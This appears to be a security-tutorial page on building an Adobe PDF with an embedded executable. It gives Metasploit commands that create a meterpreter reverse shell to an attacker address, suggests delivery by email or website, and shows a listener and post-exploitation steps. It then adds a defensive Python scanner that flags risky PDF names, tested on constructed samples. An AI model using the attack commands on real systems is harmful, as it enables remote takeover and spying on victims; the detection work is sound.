Adobe PDF Attack
Last modified: 2023-07-24
Attackers can compromise a target machine by sending it a malicious PDF.
The PDF created by this process is easily detected by the modern Windows built-in antivirus, so this exploitation may not be useful for attackers.
Attackers can create a malicious PDF using Metasploit:

msfconsole
msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Set the payload for Windows if the target machine is Windows
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's IP address
msf> set lhost 10.0.0.1
# Change the filename
msf> set filename supersafe.pdf
# Optionally, a custom PDF can be used as the carrier
msf> set infilename /path/to/custom.pdf
msf> exploit
After creating the PDF, attackers need to deliver it to the target user. There are various ways to do that, for example:
- Host the PDF on the attacker's website.
- Send an email with the PDF attached.
To receive the incoming connection from the target machine, attackers start a listener on their own machine:

msf> use exploit/multi/handler
# Match the payload that was set when the PDF was created
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's IP address
msf> set lhost 10.0.0.1
msf> exploit
When the victim opens the PDF in Adobe Reader, the file starts a reverse shell that connects back to the attacker's machine.
After that, attackers can control the victim's machine from their terminal:

# In the Metasploit session
meterpreter> pwd
# Take a screenshot of the victim's screen
meterpreter> screenshot
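From the defender's side, a PDF of the kind produced above is worth triaging before it reaches a reader: an embedded-executable PDF carries an embedded file object together with an action (launch, open or automatic) that asks the viewer to do something with it. The script below is an added example, not part of the original page and not Metasploit code: it extracts PDF name objects from a file's raw bytes, undoes the `#xx` hex escapes that PDF names allow (so `/Laun#63h` is still recognised as `/Launch`), counts the names that warrant attention, and returns a verdict. The two sample documents, the file name `payload.exe` and the verdict labels are constructed for the example; the sample "suspicious" PDF is a structural stub with no real executable and no cross-reference table.

```python
"""Triage PDFs for embedded files and risky actions (added example, constructed data)."""
import re
import sys
from collections import Counter

# PDF name objects that merit a closer look. The first two are the mechanism an
# embedded-executable PDF relies on; the others trigger code or actions automatically.
RISKY_KEYS = {
    "/EmbeddedFile": "embedded file stream (can carry an executable)",
    "/Launch": "launch action (asks the viewer to run an external program)",
    "/OpenAction": "action run automatically when the document opens",
    "/AA": "additional actions bound to page or annotation events",
    "/JavaScript": "JavaScript action",
    "/JS": "JavaScript code string",
}

# A name runs from '/' to the next whitespace or delimiter character (PDF 1.7 syntax).
NAME_RE = re.compile(rb"/([^\s/\[\]<>(){}%]*)")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> bytes:
    """Undo #xx escapes inside a PDF name, e.g. b'Laun#63h' -> b'Launch'."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def scan_pdf_bytes(data: bytes) -> dict:
    """Count occurrences of each risky name after decoding escapes; exact-name match only."""
    counts: Counter = Counter()
    for m in NAME_RE.finditer(data):
        name = "/" + decode_name(m.group(1)).decode("latin-1")
        if name in RISKY_KEYS:
            counts[name] += 1
    return dict(counts)


def triage(data: bytes) -> dict:
    """Return a verdict plus the findings and caveats that produced it."""
    findings = scan_pdf_bytes(data)
    notes = []
    if b"%PDF-" not in data[:1024]:
        notes.append("no %PDF- header in the first 1024 bytes")
    if b"/ObjStm" in data:
        # Names inside compressed object streams are invisible to a raw-byte scan.
        notes.append("object streams present: compressed objects were not inspected")
    launch = "/Launch" in findings
    embedded_with_trigger = "/EmbeddedFile" in findings and (
        "/OpenAction" in findings or "/AA" in findings
    )
    if launch or embedded_with_trigger:
        verdict = "quarantine"  # constructed label: block and hand to IR
    elif findings or notes:
        verdict = "review"      # constructed label: inspect manually / with a PDF parser
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "notes": notes}


# Constructed sample: a minimal, harmless single-page document.
BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample: the shape of an embedded-file-plus-launch PDF, with the
# /Launch and /EmbeddedFile names hex-escaped and a 4-byte non-executable stub.
SUSPICIOUS_PDF = (
    b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R "
    b"/Names << /EmbeddedFiles << /Names [(payload.exe) 4 0 R] >> >> >>\nendobj\n"
    b"4 0 obj\n<< /Type /Filespec /F (payload.exe) /EF << /F 6 0 R >> >>\nendobj\n"
    b"5 0 obj\n<< /S /Laun#63h /F (payload.exe) >>\nendobj\n"
    b"6 0 obj\n<< /Type /Embedded#46ile /Length 4 >>\nstream\nMZ\x90\x00\nendstream\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)


if __name__ == "__main__":
    # Triage files given on the command line, or the two constructed samples.
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [
        ("benign-sample", BENIGN_PDF),
        ("suspicious-sample", SUSPICIOUS_PDF),
    ]
    for label, blob in targets:
        result = triage(blob)
        print(f"{label}: {result['verdict']}")
        for key, n in result["findings"].items():
            print(f"  {key} x{n}: {RISKY_KEYS[key]}")
        for note in result["notes"]:
            print(f"  note: {note}")
```

The scan is deliberately a raw-byte pass so it works on malformed files that a strict parser would reject, which is why it must report the `/ObjStm` caveat: a document that hides its catalog in a compressed object stream needs a real PDF parser (or a decompression step) before the same name check is meaningful. Legitimate attachments (PDF/A-3 invoices, for instance) also use `/EmbeddedFile`, so the verdict only escalates to `quarantine` when the embedded file is paired with a launch or automatic action.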